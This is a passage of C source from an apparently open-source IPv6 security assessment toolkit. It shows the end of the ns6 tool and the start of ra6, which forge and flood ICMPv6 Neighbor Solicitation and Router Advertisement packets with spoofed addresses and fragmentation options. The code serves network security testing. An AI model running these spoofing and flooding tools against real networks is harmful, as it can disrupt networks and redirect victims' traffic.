if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ETH_DATA_LEN)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (U. part) (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_neighbor_solicit)) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting Neighbor Solicitation header (should be using Frag. option?)"); exit(EXIT_FAILURE); } ns= (struct nd_neighbor_solicit *) (ptr); ns->nd_ns_type = ND_NEIGHBOR_SOLICIT; ns->nd_ns_code = 0; ns->nd_ns_reserved = 0; ns->nd_ns_target = targetaddr; ptr += sizeof(struct nd_neighbor_solicit); sllaopt = (struct nd_opt_slla *) ptr; /* If a single source link-layer address is specified, it is included in all packets */ if(sllopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_slla)) <= (v6buffer+max_packet_size)){ sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy(linkaddr[0].a, sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); } else{ puts("Packet too large while processing source link-layer addresss opt. (should be using Frag. option?)"); exit(EXIT_FAILURE); } } startofprefixes = ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Solicitation message, and * send the attack packet(s). */ void send_packet(struct iface_data *idata){ sources=0; do{ if(floods_f){ /* Randomize the IPv6 Source address based on the specified prefix and prefix length (defaults to fe80::/64). */ startrand= idata->srcpreflen/16; for(i=0; iip6_src.s6_addr16[i]= 0; for(i=startrand; i<8; i++) ipv6->ip6_src.s6_addr16[i]=random(); if(idata->srcpreflen%16){ mask=0xffff; for(i=0; i<(idata->srcpreflen%16); i++) mask= mask>>1; ipv6->ip6_src.s6_addr16[startrand]= ipv6->ip6_src.s6_addr16[startrand] & htons(mask); } for(i=0; i<=(idata->srcpreflen/16); i++) ipv6->ip6_src.s6_addr16[i]= ipv6->ip6_src.s6_addr16[i] | idata->srcaddr.s6_addr16[i]; if(!idata->hsrcaddr_f){ for(i=0; i<6; i++) ethernet->src.a[i]= random(); /* If the source-link layer address must be included, but no value was specified we set it to the randomized Ethernet Source Address */ if(sllopt_f && !sllopta_f){ bcopy(ethernet->src.a, sllaopt->address, ETH_ALEN); } } } targets=0; do{ if(floodt_f){ /* Randomizing the ND Target Address based on the prefix specified by "targetaddr" and targetpreflen. */ startrand= targetpreflen/16; for(i=0; ind_ns_target.s6_addr16[i]= 0; for(i=startrand; i<8; i++) ns->nd_ns_target.s6_addr16[i]=random(); if(targetpreflen%16){ mask=0xffff; for(i=0; i<(targetpreflen%16); i++) mask= mask>>1; ns->nd_ns_target.s6_addr16[startrand]= ns->nd_ns_target.s6_addr16[startrand] \ & htons(mask); } for(i=0; i<=(targetpreflen/16); i++) ns->nd_ns_target.s6_addr16[i]= ns->nd_ns_target.s6_addr16[i] | \ targetaddr.s6_addr16[i]; } if(nlinkaddr==1) /* If a single source link-layer address must be included, it is included */ linkaddrs=1; /* by init_packet_data() (rather than by send_packet() */ else linkaddrs=0; do{ newdata_f=0; ptr = startofprefixes; while(linkaddrstype= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; bcopy(linkaddr[linkaddrs].a, sllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_slla); linkaddrs++; newdata_f=1; } ns->nd_ns_cksum = 0; ns->nd_ns_cksum = in_chksum(v6buffer, ns, ptr-((unsigned char *)ns), IPPROTO_ICMPV6); if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } } }while(linkaddrs\n" "Please send any bug reports to " ); } /* * Function: print_attack_info() * * Print attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodt_f) printf("Flooding the target with %u ND Target Addresses\n", ntargets); if(!floods_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: randomized for each packet"); } if(ether_ntop(&(idata->hdstaddr), phdstaddr, sizeof(phdstaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", phdstaddr, \ ((!idata->hdstaddr_f)?" (all-nodes multicast)":"")); if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, \ ((!idata->dstaddr_f)?" (all-nodes link-local multicast)":"")); printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; i Address: %s\n", \ ((floods_f && !sllopta_f)?"(randomized for each packet)":plinkaddr)); } } ipv6toolkit-1.5.1/tools/ns6.h000066400000000000000000000000541223702747200160340ustar00rootroot00000000000000/* * Header file for the ns6 tool * */ ipv6toolkit-1.5.1/tools/ra6.c000066400000000000000000001665171223702747200160320ustar00rootroot00000000000000/* * ra6: A security assessment tool for attack vectors based on * ICMPv6 Router Advertisement messages * * Copyright (C) 2009-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make ra6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ra6.h" #include "ipv6toolkit.h" #include "libipv6.h" void init_packet_data(struct iface_data *); void send_packet(struct iface_data *, const u_char *); void usage(void); void print_help(void); void print_attack_info(struct iface_data *); struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct in6_addr *pkt_ipv6addr; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; char all_nodes_addr[]= ALL_NODES_MULTICAST_ADDR; unsigned char buffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *v6buffer, *ptr, *startofprefixes, *ptrhdr, *ptrhdrend; unsigned char *fragpart, *fptr, *fptrend, *ptrend; struct ip6_hdr *ipv6, *pkt_ipv6, *fipv6; struct nd_router_advert *ra; struct nd_router_solicit *pkt_rs; struct nd_opt_rdnss_l *dnsopt; struct ether_header *ethernet, *pkt_ether; struct nd_opt_mtu *mtuopt; struct nd_opt_slla *sllaopt; struct nd_opt_prefix_info *prefixopt; struct nd_opt_route_info_l *routeopt; char *lasts, *rpref, *endptr; size_t nw; u_int16_t lifetime; u_int32_t reachable; u_int32_t retrans; u_int8_t curhop, hoplimit; char preference=0, prefbits=0; unsigned int nprefixes=0, nroutes=0, nfrags=0; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; unsigned char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], nfrags, fragsize, max_packet_size, m, pad; unsigned char *prev_nh, *startoffragment; struct ip6_frag fraghdr, *fh; unsigned long ul_res, ul_val; unsigned int i, j, startrand, sources, nsources, prefixes, routes, mtus; unsigned int nfloodp, nfloodr, endrand; unsigned int nfloodda, nflooddoa, nsleep; u_int16_t mask; u_int8_t prefixlen[MAX_PREFIX_OPTION]; u_int32_t prefixvalid[MAX_PREFIX_OPTION]; u_int32_t prefixpref[MAX_PREFIX_OPTION]; struct in6_addr prefix[MAX_PREFIX_OPTION]; u_int8_t prefixflags[MAX_PREFIX_OPTION]; struct in6_addr route[MAX_ROUTE_OPTION]; u_int8_t routelen[MAX_ROUTE_OPTION]; u_int32_t routelife[MAX_ROUTE_OPTION]; u_int8_t routepref[MAX_ROUTE_OPTION]; struct in6_addr rdnss[MAX_RDNSS_OPTION][MAX_RDNSS_OPT_ADDRS]; u_int32_t rdnsslife[MAX_RDNSS_OPTION]; unsigned int nrdnss=0, dnsopts; unsigned int nrdnssopt[MAX_RDNSS_OPTION]; int smaxaddrs; u_int16_t mtu[MAX_MTU_OPTION]; unsigned int nmtu=0; struct ether_addr linkaddr[MAX_SLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *pref; char *preflen; char *prefvalid; char *prefpref; char *prefflags; char *charptr; char plinkaddr[ETHER_ADDR_PLEN], phsrcaddr[ETHER_ADDR_PLEN], phdstaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pprefix[INET6_ADDRSTRLEN]; char pv6addr[INET6_ADDRSTRLEN]; /* Flags used for option processing */ unsigned char managed_f=0, other_f=0, home_f=0, proxy_f=0; unsigned char mtuopt_f=0, sllopt_f=0, sllopta_f=0, prefopt_f=0, fragh_f=0, hoplimit_f=0; unsigned char listen_f = 0, floodp_f=0, floods_f=0, floodr_f=0, multicastdst_f=0, floodd_f=0; unsigned char loop_f=0, sleep_f=0, accepted_f=0, newdata_f=0; struct iface_data idata; struct filters filters; int main(int argc, char **argv){ extern char *optarg; int r, sel, fd; fd_set sset, rset; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"curhop", required_argument, 0, 'c'}, {"lifetime", required_argument, 0, 't'}, {"reachable", required_argument, 0, 'r'}, {"retrans", required_argument, 0, 'x'}, {"managed", no_argument, 0, 'm'}, {"other", no_argument, 0, 'o'}, {"home-agent", no_argument, 0, 'a'}, {"nd-proxy", no_argument, 0, 'q'}, {"preference", required_argument, 0, 'p'}, {"src-link-opt", required_argument, 0, 'E'}, {"add-slla-opt", no_argument, 0, 'e'}, {"prefix-opt", required_argument, 0, 'P'}, {"route-opt", required_argument, 0, 'R'}, {"mtu-opt", required_argument, 0, 'M'}, {"rdnss-opt", required_argument, 0, 'N'}, {"link-src-address", required_argument, 0, 'S'}, {"link-dst-address", required_argument, 0, 'D'}, {"flood-prefixes", required_argument, 0, 'f'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-routes", required_argument, 0, 'w'}, {"flood-dns", required_argument, 0, 'W'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:A:u:U:H:y:c:t:r:x:moaqp:E:eP:R:M:N:S:D:f:F:w:W:lz:Lj:k:J:K:b:g:B:G:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; curhop=255; prefbits= DEFAULT_ROUTER_PREFERENCE; preference= prefbits>>3; lifetime= DEFAULT_ROUTER_LIFETIME; reachable= DEFAULT_ROUTER_REACHABLE; retrans= DEFAULT_ROUTER_RETRANS; srandom(time(NULL)); /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in '-s' (IPv6 Source Address) option"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ idata.hsrcaddr_f = 1; if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } break; case 'D': /* Destination Ethernet Address */ idata.hdstaddr_f = 1; if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } break; case 'c': /* CurHop value */ curhop = abs(atoi(optarg)); break; case 'm': /* "Managed" bit */ managed_f = ND_RA_FLAG_MANAGED; break; case 'o': /* "Other" bit */ other_f = ND_RA_FLAG_OTHER; break; case 'a': /* "Home Agent" bit */ home_f = ND_RA_FLAG_HOME_AGENT; break; case 'q': /* ND Proxy bit */ proxy_f= ND_RA_FLAG_ND_PROXY; break; case 'p': /* "Preference" bits */ preference= atoi(optarg); if(preference<-2 || preference >1){ puts("Error in 'preference' parameter"); exit(EXIT_FAILURE); } prefbits = (preference << 3) & 0x18; break; case 't': /* Router Lifetime */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'lifetime' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg) lifetime = ul_res; break; case 'r': /* Reachable Time */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'reachable' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg) reachable = ul_res; break; case 'x': /* Retrans Time */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'retransmit' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg) retrans = ul_res; break; case 'E': /* Source link-layer option */ sllopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } sllopta_f=1; nlinkaddr++; break; case 'e': /* Add Source link-layer option */ sllopt_f = 1; break; case 'P': /* Prefix Information option */ if(nprefixes >= MAX_PREFIX_OPTION){ puts("Too many Prefix Options"); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in prefix option number %u. \n", nprefixes+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &prefix[nprefixes]) <= 0){ printf("Error in prefix option number %u. ", nprefixes+1); perror("inet_pton():"); exit(EXIT_FAILURE); } if((preflen= strtok_r(NULL, "#", &lasts)) == NULL){ printf("Length error in prefix option number %u.\n", nprefixes+1); exit(EXIT_FAILURE); } prefixlen[nprefixes] = atoi(preflen); if(prefixlen[nprefixes]>128){ printf("Length error in prefix option number %u.\n", nprefixes+1); exit(EXIT_FAILURE); } prefixflags[nprefixes]=0; prefixpref[nprefixes] = DEFAULT_PREFIX_PREFERRED; prefixvalid[nprefixes] = DEFAULT_PREFIX_VALID; if((prefflags= strtok_r(NULL, "#", &lasts)) == NULL){ nprefixes++; prefopt_f=1; break; } while(*prefflags){ if(*prefflags == 'L') prefixflags[nprefixes] = prefixflags[nprefixes] | ND_OPT_PI_FLAG_ONLINK; else if(*prefflags == 'A') prefixflags[nprefixes] = prefixflags[nprefixes] | ND_OPT_PI_FLAG_AUTO; else if(*prefflags == 'R') prefixflags[nprefixes] = prefixflags[nprefixes] | ND_OPT_PI_FLAG_RADDR; else if(*prefflags == '-') break; else{ printf("Flags error in prefix option number %u\n", nprefixes+1); exit(EXIT_FAILURE); } prefflags++; } if((prefvalid= strtok_r(NULL, "#", &lasts)) == NULL){ nprefixes++; prefopt_f=1; break; } if((ul_res = strtoul(prefvalid, &endptr, 0)) == ULONG_MAX){ printf("Error in prefix option number %u. ", nprefixes+1); perror("strtoul()"); exit(EXIT_FAILURE); } if(endptr != optarg){ prefixvalid[nprefixes] = ul_res; } else{ nprefixes++; prefopt_f=1; break; } if((prefpref= strtok_r(NULL, "#", &lasts)) == NULL){ nprefixes++; prefopt_f=1; break; } if((ul_res = strtoul(prefpref, &endptr, 0)) == ULONG_MAX){ printf("Error in prefix option number %u. ", nprefixes+1); perror("strtoul()"); exit(EXIT_FAILURE); } if(endptr != prefpref) prefixpref[nprefixes] = ul_res; nprefixes++; prefopt_f=1; break; case 'R': /* Route Information option */ if(nroutes >= MAX_ROUTE_OPTION){ puts("Too many Route Information Options"); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in Route Information option number %u. \n", nroutes+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &route[nroutes]) <= 0){ printf("Error in Route Information option number %u.\n", nroutes+1); perror("inet_pton():"); exit(EXIT_FAILURE); } if((preflen= strtok_r(NULL, "#", &lasts)) == NULL){ printf("Length error in Route Information option number %u.\n", nroutes+1); exit(EXIT_FAILURE); } routelen[nroutes] = atoi(preflen); if(routelen[nroutes]>128){ printf("Length error in Route Information option number %u.\n", nroutes+1); exit(EXIT_FAILURE); } routepref[nroutes] = DEFAULT_ROUTE_OPT_PREF; routelife[nroutes]= DEFAULT_ROUTE_OPT_LIFE; if((rpref = strtok_r(NULL, "#", &lasts)) == NULL){ nroutes++; break; } routepref[nroutes]= atoi(rpref); routepref[nroutes] = (routepref[nroutes]<<3) & 0x18; if((ul_res = strtoul(lasts, &endptr, 0)) == ULONG_MAX){ printf("Error in 'lifetime' parameter of Route Information option number %u\n", \ nroutes+1); exit(EXIT_FAILURE); } if(endptr != lasts) routelife[nroutes]= ul_res; nroutes++; break; case 'N': /* Recursive DNS Server option */ if(nrdnss >= MAX_RDNSS_OPTION){ puts("Too many Recursive DNS Server"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "#", &lasts)) == NULL){ printf("Error in Recursive DNS Server option number %u. \n", nrdnss+1); exit(EXIT_FAILURE); } if((ul_val = strtoul(charptr, &endptr, 0)) == ULONG_MAX){ printf("Error in 'lifetime' parameter of Recursive DNS Server option number %u\n",\ nrdnss+1); exit(EXIT_FAILURE); } if(endptr == charptr){ printf("Error in Recursive DNS Server option number %u. \n", nrdnss+1); exit(EXIT_FAILURE); } rdnsslife[nrdnss]= ul_val; nrdnssopt[nrdnss]= 0; while(nrdnssopt[nrdnss]< MAX_RDNSS_OPT_ADDRS && (charptr = strtok_r(NULL, "#", &lasts)) != NULL){ if ( inet_pton(AF_INET6, charptr, &rdnss[nrdnss][nrdnssopt[nrdnss]]) <= 0){ printf("Error in address #%u of Recursive DNS Server option number %u.\n", \ nrdnssopt[nrdnss]+1, nrdnss+1); perror("inet_pton():"); exit(EXIT_FAILURE); } nrdnssopt[nrdnss]++; } nrdnss++; break; case 'M': /* MTU option */ mtu[nmtu]= atoi(optarg); nmtu++; break; case 'w': /* Flood Routes */ nfloodr= atoi(optarg); floodr_f= 1; break; case 'f': /* Flood prefixes */ nfloodp= atoi(optarg); floodp_f= 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'W': /* Flood DNS */ if((charptr = strtok_r(optarg, "#", &lasts)) == NULL){ puts("Error in option '-k'"); exit(EXIT_FAILURE); } nfloodda = atoi(charptr); if((charptr = strtok_r(NULL, "#", &lasts)) == NULL){ nflooddoa=127; } else{ nflooddoa=atoi(charptr); if(nfloodda>MAX_RDNSS_OPT_ADDRS){ puts("Error in '-k' option: Number of addresses per option exceeds 127"); exit(EXIT_FAILURE); } } floodd_f= 1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in 